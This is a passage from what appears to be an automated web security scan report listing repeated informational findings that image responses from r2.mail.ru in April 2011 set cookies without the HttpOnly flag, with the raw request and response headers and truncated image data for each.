Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3343
Connection: keep-alive
Set-Cookie: p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.0..
...[SNIP]...

16.101. http://r2.mail.ru/b12526059.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526059.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526059.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2876
Connection: keep-alive
Set-Cookie: p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F....
...[SNIP]...

16.102. http://r2.mail.ru/b12526060.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526060.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526060.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 3123
Connection: keep-alive
Set-Cookie: p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...

16.103. http://r2.mail.ru/b12526061.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526061.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526061.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3005
Connection: keep-alive
Set-Cookie: p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.4..
...[SNIP]...

16.104. http://r2.mail.ru/b12526062.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526062.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526062.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3109
Connection: keep-alive
Set-Cookie: p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...

16.105. http://r2.mail.ru/b12526063.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526063.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526063.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 2846
Connection: keep-alive
Set-Cookie: p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.6..
...[SNIP]...

16.106. http://r2.mail.ru/b12526064.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526064.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526064.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 2433
Connection: keep-alive
Set-Cookie: p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.6..
...[SNIP]...

16.107. http://r2.mail.ru/b12526065.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526065.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526065.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/gif
Content-Length: 119
Connection: keep-alive
Set-Cookie: p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...H.....\.r.J...J.y.8.............-.....T...x..n..)kL.3..>;.P.t.Q..-f#.....;

16.108. http://r2.mail.ru/b12526191.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526191.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526191.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 535
Connection: keep-alive
Set-Cookie: p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........f.=p.2h.......8nz..`~.b.....4[....2Z....Ce....Km..T.Il......e'R~Lm....c...Bt...$N{...... Ix..d......8_..*aLo....Hl..7m....5k........../fa.]|..3h=c....,U..1h.......Ar.........Qr.!L|.2iG
...[SNIP]...

16.109. http://r2.mail.ru/b12526192.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526192.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526192.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 165
Connection: keep-alive
Set-Cookie: p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.......`t.@|.=|.Qx.E|.=.L|.9..D~.G.@.................................................................!..Created with GIMP.,........... .@.p...4....@C.5.C..;

16.110. http://r2.mail.ru/b12526193.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526193.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526193.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 636
Connection: keep-alive
Set-Cookie: p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........(......]..':.7T.../................................................#H.#H...................e.....j........cv....0K.........................l...............:@..................Wc.[s.....
...[SNIP]...

16.111. http://r2.mail.ru/b12526194.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526194.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526194.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 93
Connection: keep-alive
Set-Cookie: p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........Us.....*..!.......,................#..."...jJ......&....X
....+X..u....
.DC..;

16.112. http://r2.mail.ru/b12526208.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526208.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526208.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 132
Connection: keep-alive
Set-Cookie: p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a/..................!.......,..../.....U.....c.......(.........j..[...
........H..p...7.)e../.B1M....4"5\...V...2`<8.........;

16.113. http://r2.mail.ru/b12526210.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526210.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526210.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 135
Connection: keep-alive
Set-Cookie: p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a................;.;............!.......,..........L(...%.X.......\$..hv...B@z........A....H.t.)...-P.d*6..@e2....J.RN...B...ht..;

16.114. http://r2.mail.ru/b12527647.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12527647.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12527647.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 131
Connection: keep-alive
Set-Cookie: p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a........P.....D................!.......,..........H....$.H.$B..k..UQ...\.(....9|sfF...7..0J.d..!..Q.09b&.0$......G.R...x.H..;

16.115. http://r2.mail.ru/b12529050.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12529050.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12529050.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/jpeg
Content-Length: 3351
Connection: keep-alive
Set-Cookie: p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:27 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.................................
...[SNIP]...

16.116. http://r2.mail.ru/b12530142.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12530142.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530142.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2303
Connection: keep-alive
Set-Cookie: p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...

16.117. http://r2.mail.ru/b12530159.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12530159.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530159.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2119
Connection: keep-alive
Set-Cookie: p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...

16.118. http://r2.mail.ru/b12531249.jpg  previous  next

